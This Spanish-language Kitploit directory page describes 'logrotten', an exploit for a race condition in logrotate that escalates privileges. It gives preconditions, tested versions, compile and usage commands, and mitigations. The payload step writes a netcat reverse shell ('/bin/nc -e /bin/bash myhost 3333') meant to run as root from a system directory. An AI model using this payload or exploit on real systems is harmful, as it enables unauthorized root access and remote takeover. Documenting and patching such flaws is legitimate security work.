Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
logrotten — Exploit de condición de carrera en Logrotate que permite la escalada de privilegios escribiendo archivos arbitrarios, como payloads de reverse shell, en directorios del sistema. | Kitploit
Herramientas/GitHubGitHub/whotwagner/logrotten
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de PenetraciónRed TeamingExplotación de Binarios
GitHubwhotwagner/logrotten

logrotten

Exploit de condición de carrera en Logrotate que permite la escalada de privilegios escribiendo archivos arbitrarios, como payloads de reverse shell, en directorios del sistema.

Ver Repositorio
211263hace 8 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

[!WARNING]
Este repositorio se ha movido a https://codeberg.org/whotwagner/logrotten. Por favor, visita la nueva ubicación para las últimas actualizaciones.

Ganando una condición de carrera en logrotate para elevar privilegios

Logrotten Logo

Descripción breve

  • logrotate es propenso a una condición de carrera después de renombrar el archivo de registro.
  • Si logrotate se ejecuta como root, con una opción que crea un archivo (como create, copy, compress, etc.) y el usuario tiene el control de la ruta del archivo de registro, es posible abusar de una condición de carrera para escribir archivos en CUALQUIER directorio.
  • Un atacante podría elevar sus privilegios escribiendo reverse-shells en directorios como "/etc/bash_completition.d/".

Precondición para la escalada de privilegios

  • Logrotate debe ejecutarse como root
  • La ruta de registro debe estar bajo el control del atacante
  • Debe establecerse cualquier opción que cree archivos en la configuración de logrotate

Versión probada

  • Debian GNU/Linux 11 (bullseye)
  • Debian GNU/Linux 9.5 (stretch)
  • Amazon Linux 2 AMI (HVM)
  • Ubuntu 18.04.1
  • logrotate 3.8.6
  • logrotate 3.11.0
  • logrotate 3.15.0
  • logrotate 3.18.0

Compilar

  • gcc -o logrotten logrotten.c

Preparar el payload

root@kitploit:~
echo "if [ `id -u` -eq 0 ]; then (/bin/nc -e /bin/bash myhost 3333 &); fi" > payloadfile

Ejecutar el exploit

Si la opción "create" está establecida en logrotate.cfg:

root@kitploit:~
./logrotten -p ./payloadfile /tmp/log/pwnme.log

Si la opción "compress" está establecida en logrotate.cfg:

root@kitploit:~
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log

Problemas conocidos

  • Era difícil ganar la carrera dentro de un contenedor docker o en un volumen lvm2. Esta versión de logrotten mejora la fiabilidad.

Mitigación

  • Asegúrate de que la ruta de registro sea propiedad de root
  • Usa la opción "su" en logrotate.cfg
  • Usa selinux o apparmor

Autor

  • Wolfgang Hotwagner

Referencias

  • https://tech.feedyourhead.at/content/details-of-a-logrotate-race-condition
  • https://tech.feedyourhead.at/content/abusing-a-race-condition-in-logrotate-to-elevate-privileges
  • https://github.com/whotwagner/logrotten
  • https://www.ait.ac.at/themen/cyber-security/ait-sa-20190930-01/
  • https://tech.feedyourhead.at/content/privilege-escalation-in-groonga-httpd
Descargar herramienta